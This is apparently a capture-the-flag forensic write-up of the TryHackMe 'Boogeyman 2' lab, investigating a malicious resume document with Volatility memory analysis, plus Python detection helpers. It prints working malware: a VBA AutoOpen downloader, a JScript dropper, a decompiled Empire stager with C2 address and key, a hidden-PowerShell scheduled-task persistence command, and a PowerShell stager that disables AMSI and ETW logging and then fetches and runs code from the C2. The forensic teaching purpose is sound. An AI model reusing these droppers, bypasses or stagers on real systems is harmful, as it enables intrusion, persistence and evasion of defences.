Boogeyman 2

The Boogeyman is back. Are you still afraid of the Boogeyman?

CONTEXT

Challenge Link: TryHackMe - Boogeyman 2

I. Background

Maxine, a Human Resource Specialist working for Quick Logistics LLC, received an application for one of the open positions in the company. Unbeknownst to her, the attached resume was malicious and compromised her workstation.

Header          Value
From            "westaylor23@outlook.com" <westaylor23@outlook.com>
To              "maxine.beck@quicklogisticsorg.onmicrosoft.com"
Content-Type    application/msword; name="Resume_WesleyTaylor.doc"

II. Artifacts

1. Exfiltration

A Python3 HTTP server was started on the THM machine:

ubuntu@tryhackme:~$ cd Desktop/Artefacts/

ubuntu@tryhackme:~/Desktop/Artefacts$ python3 -m http.server

Then the files were downloaded using a local browser.

2. Email Attachment

The email includes a .doc attachment, which was extracted and checked for completeness:

$ cat Resume\ -\ Application\ for\ Junior\ IT\ Analyst\ Role.eml | grep -i -E '^[A-Z0-9+/=]{32,76}' | tr -d '\r\n' | base64 -d > Resume_WesleyTaylor.doc

$ file Resume_WesleyTaylor.doc

  Resume_WesleyTaylor.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: tryhackme, Template: Normal, Last Saved By: tryhackme, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 05:00, Create Time/Date: Sun Aug 20 21:49:00 2023, Last Saved Time/Date: Sun Aug 20 22:24:00 2023, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
  
$ binwalk Resume_WesleyTaylor.doc                                                                                                                       

  DECIMAL       HEXADECIMAL     DESCRIPTION
  --------------------------------------------------------------------------------
  4865          0x1301          PNG image, 468 x 222, 8-bit/color RGBA, non-interlaced
  4919          0x1337          TIFF image data, big-endian, offset of first image directory: 8
  35138         0x8942          Zip archive data, at least v2.0 to extract, compressed size: 255, uncompressed size: 540, name: [Content_Types].xml
  35442         0x8A72          Zip archive data, at least v2.0 to extract, compressed size: 192, uncompressed size: 310, name: _rels/.rels
  35675         0x8B5B          Zip archive data, at least v2.0 to extract, compressed size: 131, uncompressed size: 138, name: theme/theme/themeManager.xml
  35864         0x8C18          Zip archive data, at least v2.0 to extract, compressed size: 1939, uncompressed size: 8393, name: theme/theme/theme1.xml
  37855         0x93DF          Zip archive data, at least v2.0 to extract, compressed size: 182, uncompressed size: 283, name: theme/theme/_rels/themeManager.xml.rels
  38455         0x9637          End of Zip archive, footer length: 22
  38477         0x964D          XML document, version: "1.0"
  
$ md5sum Resume_WesleyTaylor.doc                     

  52c4384a0b9e248b95804352ebec6c5b  Resume_WesleyTaylor.doc

3. Memory Dump

The compromised workstation seems to be running on Windows 10:

$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw imageinfo
  
  Volatility Foundation Volatility Framework 2.6.1
  INFO    : volatility.debug    : Determining profile based on KDBG search...
           Suggested Profile(s) : Win10x64_18362
                      AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
                      AS Layer2 : FileAddressSpace ($THM/Boogeyman2/WKSTN-2961.raw)
                       PAE type : No PAE
                            DTB : 0x1aa000L
                           KDBG : 0xf802536405e0L
           Number of Processors : 2
      Image Type (Service Pack) : 0
                 KPCR for CPU 0 : 0xfffff80252340000L
                 KPCR for CPU 1 : 0xffffa601e54c0000L
              KUSER_SHARED_DATA : 0xfffff78000000000L
            Image date and time : 2023-08-21 14:14:28 UTC+0000
      Image local date and time : 2023-08-21 15:14:28 +0100

And that particular endpoint is owned by maxine.beck:

$ python3 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw filescan | grep 'Resume_WesleyTaylor'

  0xe58f86465740  \Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc	216
  0xe58f878c1420  \Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc	216

ANALYSIS

I. MalDoc

The email attachment contains a VBA macro stream named NewMacros (oledump.py marks streams that contain macro code with the letter M):

$ python3 ./git/DidierStevensSuite/oledump.py ./CTF/THM/Boogeyman2/Resume_WesleyTaylor.doc                   

    1:       114 '\x01CompObj'
    2:      4096 '\x05DocumentSummaryInformation'
    3:      4096 '\x05SummaryInformation'
    4:      7288 '1Table'
    5:     28574 'Data'
    6:       414 'Macros/PROJECT'
    7:        71 'Macros/PROJECTwm'
    8: M    2027 'Macros/VBA/NewMacros'
    9: m     962 'Macros/VBA/ThisDocument'
   10:      2787 'Macros/VBA/_VBA_PROJECT'
   11:      2242 'Macros/VBA/__SRP_0'
   12:       122 'Macros/VBA/__SRP_1'
   13:       935 'Macros/VBA/__SRP_2'
   14:       156 'Macros/VBA/__SRP_3'
   15:       570 'Macros/VBA/dir'
   16:      4096 'WordDocument'

Looking at what it does:

$ python3 ./git/DidierStevensSuite/oledump.py -s 8 --vbadecompress $THM/Boogeyman2/Resume_WesleyTaylor.doc

Once the document is opened, the AutoOpen macro downloads a file (update.png), saves it as C:\ProgramData\update.js, and then executes it via wscript.exe:

Attribute VB_Name = "NewMacros"
Sub AutoOpen()

spath = "C:\ProgramData\"
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png", False
xHttp.Send
With bStrm
    .Type = 1
    .Open
    .write xHttp.responseBody
    .savetofile spath & "\update.js", 2
End With

Set shell_object = CreateObject("WScript.Shell")
shell_object.Exec ("wscript.exe C:\ProgramData\update.js")

End Sub

The memory dump confirms the execution: the malicious process, wscript.exe (PID 4260), was indeed spawned by Microsoft Word (PID 1124), and it eventually spawned updater.exe (PID 6216):

$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 pstree | grep -C2 -i wscript

  Volatility Foundation Volatility Framework 2.6.1
  ... 0xffffe58f87c8a080:OUTLOOK.EXE                   1440    596     22      0 2023-08-21 14:09:04 UTC+0000
  .... 0xffffe58f81150080:WINWORD.EXE                  1124   1440     18      0 2023-08-21 14:12:31 UTC+0000
  ..... 0xffffe58f864ca0c0:wscript.exe                 4260   1124      6      0 2023-08-21 14:12:47 UTC+0000
  ...... 0xffffe58f87ac0080:updater.exe                6216   4260     18      0 2023-08-21 14:12:48 UTC+0000
  ....... 0xffffe58f84bd1080:conhost.exe               4464   6216      5      0 2023-08-21 14:14:03 UTC+0000
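
The parent/child relationship above can be checked mechanically. The following Python code is an added example, not part of the original write-up: it parses Volatility 2 pstree rows (the five rows above are embedded as sample input) and flags any script host whose parent is an Office application. The OFFICE_APPS and SCRIPT_HOSTS lists and all function names are assumptions chosen for illustration.

```python
import re

# Rows copied from the pstree output above (Volatility 2 column layout:
# offset:name, PID, PPID, threads, handles, start time).
PSTREE = """\
... 0xffffe58f87c8a080:OUTLOOK.EXE                   1440    596     22      0 2023-08-21 14:09:04 UTC+0000
.... 0xffffe58f81150080:WINWORD.EXE                  1124   1440     18      0 2023-08-21 14:12:31 UTC+0000
..... 0xffffe58f864ca0c0:wscript.exe                 4260   1124      6      0 2023-08-21 14:12:47 UTC+0000
...... 0xffffe58f87ac0080:updater.exe                6216   4260     18      0 2023-08-21 14:12:48 UTC+0000
....... 0xffffe58f84bd1080:conhost.exe               4464   6216      5      0 2023-08-21 14:14:03 UTC+0000
"""

# Illustrative lists (assumptions for this example); tune them per environment.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}

ROW = re.compile(
    r"^[.\s]*0x[0-9a-f]+:(?P<name>.+?)\s+(?P<pid>\d+)\s+(?P<ppid>\d+)"
    r"\s+\d+\s+\S+\s+(?P<start>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)",
    re.IGNORECASE,
)


def parse_pstree(text):
    """Return {pid: {"name", "ppid", "start"}} for every process row found."""
    procs = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:  # banner, separator and grep context lines do not match
            procs[int(m["pid"])] = {
                "name": m["name"], "ppid": int(m["ppid"]), "start": m["start"],
            }
    return procs


def ancestry(procs, pid):
    """Walk PPID links upward; the seen-set guards against PID-reuse loops."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(pid)
        pid = procs[pid]["ppid"]
    return chain[::-1]


def descendants(procs, pid):
    """Every process below pid, in the order the rows were parsed."""
    out, stack, seen = [], [pid], {pid}
    while stack:
        parent = stack.pop()
        for child, info in procs.items():
            if info["ppid"] == parent and child not in seen:
                seen.add(child)
                out.append(child)
                stack.append(child)
    return out


def label(procs, pid):
    return f'{procs[pid]["name"]}:{pid}'


def office_script_chains(procs):
    """Flag script hosts whose direct parent is an Office application."""
    hits = []
    for pid, info in procs.items():
        parent = procs.get(info["ppid"])
        if (parent and info["name"].lower() in SCRIPT_HOSTS
                and parent["name"].lower() in OFFICE_APPS):
            hits.append({
                "chain": [label(procs, p) for p in ancestry(procs, pid)],
                "children": [label(procs, p) for p in descendants(procs, pid)],
                "start": info["start"],
            })
    return hits


if __name__ == "__main__":
    for hit in office_script_chains(parse_pstree(PSTREE)):
        print(" -> ".join(hit["chain"]), "| spawned:", ", ".join(hit["children"]))
```

Run against the full, unfiltered pstree output, the same check surfaces the chain without needing to know the name wscript in advance.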

II. C2 Callback

To figure out the origins of updater.exe, the initially downloaded file (update.png) was extracted from the memory dump:

$ python3 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw filescan | grep 'update'   

  0xe58f836edc60  \Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\IE\GEX3PLZ6\update[1].png	216
  0xe58f8928f8b0  \Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\IE\FMJK14EZ\update[1].exe	216
  0xe58f89291e30  \Windows\Tasks\updater.exe	216
  0xe58f89293730  \Windows\Tasks\updater.exe	216
  
$ python3 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw -o $THM/Boogeyman2/volatility/ windows.dumpfiles --virtaddr 0xe58f836edc60

  Volatility 3 Framework 2.5.2
  Progress:  100.00		PDB scanning finished                        
  Cache	                FileObject      FileName        Result

  DataSectionObject     0xe58f836edc60  update[1].png   file.0xe58f836edc60.0xe58f87ddb320.DataSectionObject.update[1].png.dat

The script downloads a file (update.exe), saves it as C:\Windows\Tasks\updater.exe, and then executes it as is:

var Object = WScript.CreateObject('MSXML2.XMLHTTP');
var wshell = new ActiveXObject("WScript.Shell");

var location = "C:\\Windows\\Tasks\\";
var filename = "updater.exe";

var url = "https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.exe"
Object.Open('GET', url, false);
Object.Send();

if (Object.Status == 200)
{
 var Stream = WScript.CreateObject('ADODB.Stream');
 Stream.Open();
 Stream.Type = 1; // Stream type 1 to set binary stream
 Stream.Write(Object.ResponseBody);
 Stream.Position = 0;
 Stream.SaveToFile(location + filename, 2); // option 2 to force overwrite
 Stream.Close();
}

wshell.Run("cmd.exe /c reg.exe add \"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\" /v C:\\Windows\\Tasks /f");


wshell.Run(location + filename);
WScript.Sleep(5*60*1000);

To determine what updater.exe is, it was extracted from the memory dump and then decompiled using dnSpy:

$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 procdump -D $THM/Boogeyman2/volatility -p 6216                     

  Volatility Foundation Volatility Framework 2.6.1
  Process(V)         ImageBase          Name                 Result
  ------------------ ------------------ -------------------- ------
  0xffffe58f87ac0080 0x0000000000c20000 updater.exe          OK: executable.6216.exe
  
$ file executable.6216.exe

  executable.6216.exe: PE32+ executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 2 sections

It is an Empire stager compiled via Sharpire:

// Sharpire.EmpireStager
// Token: 0x06000010 RID: 16 RVA: 0x00002578 File Offset: 0x00000778
public EmpireStager(SessionInfo sessionInfo1)
{
	this.sessionInfo = sessionInfo1;
	this.stagingKeyBytes = Encoding.ASCII.GetBytes(this.sessionInfo.GetStagingKey());
	Random random = new Random();
	char[] array = "ABCDEFGHKLMNPRSTUVWXYZ123456789".ToCharArray();
	StringBuilder stringBuilder = new StringBuilder(8);
	for (int i = 0; i < 8; i++)
	{
		int num = random.Next(array.Length);
		stringBuilder.Append(array[num]);
	}
	this.sessionInfo.SetAgentID(stringBuilder.ToString());
	CspParameters cspParameters = new CspParameters();
	cspParameters.Flags |= CspProviderFlags.UseMachineKeyStore;
	this.rsaCrypto = new RSACryptoServiceProvider(2048, cspParameters);
}

And calls back to 128.199.95.189:8080:

using System;
using Sharpire;

// Token: 0x02000002 RID: 2
public static class Program
{
    // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
    public static void Main()
    {
        try
        {
            string text = "http://128.199.95.189:8080";
            string text2 = "xF}DlXKtjZ9/zaS2>smYiUC+;-yLqQOp";
            string workingHours = "";
            uint defaultDelay = 5U;
            double defaultJitter = 0.0;
            uint defaultLostLimit = 60U;
            string text3 = "dotnet";
            SessionInfo sessionInfo = new SessionInfo(new string[]
            {
                text,
                text2,
                text3
            });
            sessionInfo.SetWorkingHours(workingHours);
            sessionInfo.SetDefaultJitter(defaultJitter);
            sessionInfo.SetDefaultDelay(defaultDelay);
            sessionInfo.SetDefaultLostLimit(defaultLostLimit);
            new EmpireStager(sessionInfo).Execute();
        }
        catch (Exception ex)
        {
            Console.WriteLine(string.Concat(new string[]
            {
                ex.GetType().FullName,
                ": ",
                ex.Message,
                Environment.NewLine,
                ex.StackTrace
            }));
        }
    }
}

The memory dump confirms that there was a connection to this address. It seems to have been marked as CLOSED while the process is still running, meaning the agent might be currently inactive:

$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 netscan | grep -C2 updater.exe        

  Volatility Foundation Volatility Framework 2.6.1
  WARNING : volatility.debug    : Cannot find nt!ObGetObjectType
  0xe58f86b73010     TCPv4    10.10.49.181:63308             128.199.95.189:8080  CLOSED           -1                      3884-06-06 01:06:33 UTC+0000
  0xe58f87604010     TCPv4    10.10.49.181:63218             20.42.65.88:443      CLOSED           -1                      3884-06-06 01:06:31 UTC+0000
  0xe58f8797fc40     UDPv4    0.0.0.0:0                      *:*                                   6216     updater.exe    2023-08-21 14:12:48 UTC+0000
  0xe58f87980570     UDPv4    0.0.0.0:0                      *:*                                   6216     updater.exe    2023-08-21 14:12:48 UTC+0000
  0xe58f87980570     UDPv6    :::0                           *:*                                   6216     updater.exe    2023-08-21 14:12:48 UTC+0000

III. Persistence

The process memory of updater.exe was extracted from the dump to see if command executions could be discovered:

$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 memdump -p 6216 -D $THM/Boogeyman2/volatility

  Volatility Foundation Volatility Framework 2.6.1
  ************************************************************************
  Writing updater.exe [  6216] to 6216.dmp

The strings show an attempt to create a scheduled task named Updater:

$ strings -el 6216.dmp | grep -i "powershell.exe "

  "C:\Windows\system32\schtasks.exe" /Create /F /SC DAILY /ST 09:00 /TN Updater /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))\""
  "C:\Windows\system32\schtasks.exe" /Create /F /SC DAILY /ST 09:00 /TN Updater /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))\""

To confirm whether the scheduled task was created, the task file was extracted from the memory dump:

$ python3 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw filescan | grep -i 'System32\\Tasks\\'

  0xe58f86b42440  \Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask	216
  0xe58f89295990  \Windows\System32\Tasks\Updater	216
  
$ python3 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw -o $THM/Boogeyman2/volatility/ windows.dumpfiles --virtaddr 0xe58f89295990

  Volatility 3 Framework 2.5.2
  Progress:  100.00		PDB scanning finished                        
  Cache	                FileObject      FileName        Result

  DataSectionObject     0xe58f89295990  Updater         file.0xe58f89295990.0xe58f838dcbe0.DataSectionObject.Updater.dat

The following is the XML configuration of the scheduled task indicating its successful creation:

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
    <RegistrationInfo>
        <Date>2023-08-21T15:14:03</Date>
        <Author>QUICKLOGISTICS\maxine.beck</Author>
        <URI>\Updater</URI>
    </RegistrationInfo>
    <Triggers>
        <CalendarTrigger>
            <StartBoundary>2023-08-21T09:00:00</StartBoundary>
            <Enabled>true</Enabled>
            <ScheduleByDay>
                <DaysInterval>1</DaysInterval>
            </ScheduleByDay>
        </CalendarTrigger>
    </Triggers>
    <Settings>
        <!-- omitted -->
    </Settings>
    <Actions Context="Author">
        <Exec>
            <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
            <Arguments>-NonI -W hidden -c "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))"</Arguments>
        </Exec>
    </Actions>
    <Principals>
        <Principal id="Author">
            <UserId>QUICKLOGISTICS\maxine.beck</UserId>
            <LogonType>InteractiveToken</LogonType>
            <RunLevel>LeastPrivilege</RunLevel>
        </Principal>
    </Principals>
</Task>
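
A task definition like the one above can be triaged automatically. The following Python code is an added example, not part of the original write-up: it loads a carved task file, flags Exec actions whose arguments combine a hidden window, Invoke-Expression and base64 decoding, and reports which registry value the action reads. The sample is the Updater task trimmed to the relevant elements; the indicator names, regexes and the zero padding on the sample (an assumption about how carved files may be padded) are illustrative.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed sample: the Updater task from above, trimmed, encoded as UTF-16
# with a BOM and followed by zero padding (assumed carve artefact).
SAMPLE_XML = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Updater</URI></RegistrationInfo>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
      <Arguments>-NonI -W hidden -c "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))"</Arguments>
    </Exec>
  </Actions>
  <Principals><Principal id="Author"><UserId>QUICKLOGISTICS\maxine.beck</UserId></Principal></Principals>
</Task>"""
SAMPLE_DAT = SAMPLE_XML.encode("utf-16") + b"\x00" * 64

CHECKS = {
    "hidden_window": re.compile(r"-w\w*\s+hidden", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
}
# Matches "gp <key> <value>" / "Get-ItemProperty <key> <value>" with an
# unquoted key path, which is the form used by the task above.
REG_READ = re.compile(
    r"\b(?:gp|Get-ItemProperty)\s+(?P<key>HK\w+:\\[^\s\"')]+)\s+(?P<value>[\w-]+)",
    re.I,
)


def load_task(raw):
    """Decode a task file (UTF-16 with BOM, else UTF-8) and parse it."""
    has_bom = raw[:2] in (b"\xff\xfe", b"\xfe\xff")
    text = raw.decode("utf-16" if has_bom else "utf-8-sig", errors="replace")
    end = text.find("</Task>")
    if end == -1:
        raise ValueError("no closing </Task>: truncated or not a task file")
    text = text[: end + len("</Task>")]             # drop trailing padding
    text = re.sub(r"^\s*<\?xml[^>]*\?>", "", text)  # already decoded to str
    return ET.fromstring(text)


def analyze_task(raw):
    """Return one finding per Exec action that trips a check."""
    root = load_task(raw)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="?", namespaces=NS)
    user = root.findtext(".//t:Principal/t:UserId", default="?", namespaces=NS)
    findings = []
    for action in root.findall("t:Actions/t:Exec", NS):
        cmd = action.findtext("t:Command", default="", namespaces=NS)
        args = action.findtext("t:Arguments", default="", namespaces=NS)
        hits = sorted(name for name, rx in CHECKS.items() if rx.search(args))
        reg = REG_READ.search(args)
        if hits or reg:
            findings.append({
                "task": uri, "user": user, "command": cmd, "indicators": hits,
                "registry": (reg["key"], reg["value"]) if reg else None,
            })
    return findings


if __name__ == "__main__":
    for f in analyze_task(SAMPLE_DAT):
        print(f["task"], f["user"], f["indicators"], f["registry"])
```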

The command run by the scheduled task executes a base64-encoded string stored in a registry value under HKEY_CURRENT_USER, meaning that it should be visible in the NTUSER.DAT file of the compromised user, maxine.beck. The hive was therefore extracted from the memory dump:

$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 hivelist                                 

  Volatility Foundation Volatility Framework 2.6.1
  Virtual            Physical           Name
  ------------------ ------------------ ----
  0xffff9582f2681000 0x000000000f08d000 \??\C:\Users\maxine.beck\ntuser.dat
  0xffff9582f1ad4000 0x0000000013f84000 \??\C:\Users\maxine.beck\AppData\Local\Microsoft\Windows\UsrClass.dat
  0xffff9582f326d000 0x000000001ed22000 \??\C:\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.StartMenuExperienceHost_10.0.18362.387_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat
  0xffff9582eae0d000 0x00000000009ad000 [no name]
  0xffff9582eae33000 0x00000000072ca000 \REGISTRY\MACHINE\SYSTEM
  0xffff9582ee925000 0x0000000023098000 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
  0xffff9582eea98000 0x0000000020d34000 \SystemRoot\System32\Config\BBI
  0xffff9582eead5000 0x00000000323b5000 \REGISTRY\USER\S-1-5-19
  0xffff9582efe8e000 0x00000000054f7000 \REGISTRY\A\{c5dbb98f-ac23-f861-cb09-87c8bc73488b}
  0xffff9582f11fc000 0x00000000301f8000 [no name]
  0xffff9582f2b90000 0x00000000369ba000 [no name]
  0xffff9582eb808000 0x000000001003a000 \REGISTRY\MACHINE\SOFTWARE
  0xffff9582f050b000 0x00000000154b2000 \Device\HarddiskVolume1\Boot\BCD
  0xffff9582f2c10000 0x0000000019aed000 \REGISTRY\A\{91B92570-4098-466B-9A97-B1F699128FD3}
  0xffff9582eb805000 0x000000000ddc1000 \REGISTRY\USER\.DEFAULT
  0xffff9582f26ac000 0x000000000662b000 \??\C:\Users\maxine.beck\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\settings.dat

$ python2 vol.py -f $THM/Boogeyman2/WKSTN-2961.raw --dtb=0x1aa000 --kdbg=0xf802536405e0 --profile=Win10x64_18362 dumpregistry -D $THM/Boogeyman2/volatility -o 0xffff9582f2681000

  Volatility Foundation Volatility Framework 2.6.1
  **************************************************
  Writing out registry: registry.0xffff9582f2681000.ntuserdat.reg

  [..omitted..]
  ***********************************************

Then, looking for long base64 strings stored:

$ strings -el registry.0xffff9582f2681000.ntuserdat.reg | grep -i -E '[a-z0-9\+\/=]{100,}' 

  [..omitted: one long base64-encoded value..]
  
$ strings -el registry.0xffff9582f2681000.ntuserdat.reg | grep -i -E '[a-z0-9\+\/=]{100,}' | base64 -d

  If($PSVersionTable.PSVersion.Major -ge 3){$Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$Ref.GetField('amsiInitFailed','NonPublic,Static').Setvalue($Null,$true);[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0);};[System.Net.ServicePointManager]::Expect100Continue=0;$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwAxADIAOAAuADEAOQA5AC4AOQA1AC4AMQA4ADkAOgA4ADAAOAAwAA==')));$t='/news.php';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('xF}DlXKtjZ9/zaS2>smYiUC+;-yLqQOp');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Headers.Add("Cookie","hlFKsAOj=YbML71kRmKeA503M8Vjs8W8W4fY=");$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX

It is another Empire stager which was set up for persistence:

If($PSVersionTable.PSVersion.Major -ge 3){
    $Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');
    $Ref.GetField('amsiInitFailed','NonPublic,Static').Setvalue($Null,$true);
    [System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0);
};

[System.Net.ServicePointManager]::Expect100Continue=0;
$wc=New-Object System.Net.WebClient;
$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwAxADIAOAAuADEAOQA5AC4AOQA1AC4AMQA4ADkAOgA4ADAAOAAwAA==')));
$t='/news.php';
$wc.Headers.Add('User-Agent',$u);
$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$Script:Proxy = $wc.Proxy;
$K=[System.Text.Encoding]::ASCII.GetBytes('xF}DlXKtjZ9/zaS2>smYiUC+;-yLqQOp');
$R={
    $D,$K=$Args;
    $S=0..255;0..255|%{
        $J=($J+$S[$_]+$K[$_%$K.Count])%256;
        $S[$_],$S[$J]=$S[$J],$S[$_]
    };
    $D|%{
        $I=($I+1)%256;
        $H=($H+$S[$I])%256;
        $S[$I],$S[$H]=$S[$H],$S[$I];
        $_-bxor$S[($S[$I]+$S[$H])%256]
    }
};
$wc.Headers.Add("Cookie","hlFKsAOj=YbML71kRmKeA503M8Vjs8W8W4fY=");
$data=$wc.DownloadData($ser+$t);
$iv=$data[0..3];
$data=$data[4..$data.length];
-join[Char[]](& $R $data ($IV+$K))|IEX

Which also calls back to 128.199.95.189:8080:

$ echo aAB0AHQAcAA6AC8ALwAxADIAOAAuADEAOQA5AC4AOQA1AC4AMQA4ADkAOgA4ADAAOAAwAA== | base64 -d

  http://128.199.95.189:8080
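
The two manual decoding steps above (the registry value, then the string passed to FromBase64String inside it) can be done in one pass. The following Python code is an added example, not part of the original write-up: it decodes the value as UTF-16LE, which is what [Text.Encoding]::Unicode means and why raw `base64 -d` output contains NUL bytes that defeat a plain grep, then unwraps nested base64 literals and collects URLs and the request path. The sample value is constructed from a fragment of the stager shown above; the function names and the `$t` path regex are assumptions.

```python
import base64
import re

B64_CALL = re.compile(
    r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)", re.I)
URL = re.compile(r"https?://[^\s'\";)]+", re.I)
# Assumption: the request path is assigned to $t, as in the stager above.
URI_PATH = re.compile(r"\$t\s*=\s*'(/[^']*)'")

# Inner literal copied from the stager above; the outer script is a
# constructed fragment containing only the server and path assignments.
INNER = "aAB0AHQAcAA6AC8ALwAxADIAOAAuADEAOQA5AC4AOQA1AC4AMQA4ADkAOgA4ADAAOAAwAA=="
SAMPLE_SCRIPT = (
    "$ser=$([Text.Encoding]::Unicode.GetString("
    "[Convert]::FromBase64String('" + INNER + "')));$t='/news.php';"
)


def make_sample_value():
    """Encode the fragment the way the registry value is stored, then wrap
    it onto two lines to mimic terminal output that was split."""
    enc = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
    return enc[:76] + "\n" + enc[76:]


def decode_ps_base64(blob):
    """Decode base64 the way [Text.Encoding]::Unicode.GetString would."""
    compact = re.sub(r"\s+", "", blob)          # undo line wrapping
    raw = base64.b64decode(compact, validate=True)
    return raw.decode("utf-16-le")


def unwrap(script, depth=0, max_depth=5):
    """Return the script plus every nested base64 layer that decodes cleanly."""
    layers = [script]
    if depth >= max_depth:
        return layers
    for match in B64_CALL.finditer(script):
        try:
            inner = decode_ps_base64(match.group(1))
        except (ValueError, UnicodeDecodeError):
            continue                            # not UTF-16LE text; skip it
        layers.extend(unwrap(inner, depth + 1, max_depth))
    return layers


def triage(registry_value):
    """Summarise network indicators found in any layer of the value."""
    layers = unwrap(decode_ps_base64(registry_value))
    text = "\n".join(layers)
    return {
        "layers": len(layers),
        "urls": sorted(set(URL.findall(text))),
        "paths": sorted(set(URI_PATH.findall(text))),
    }


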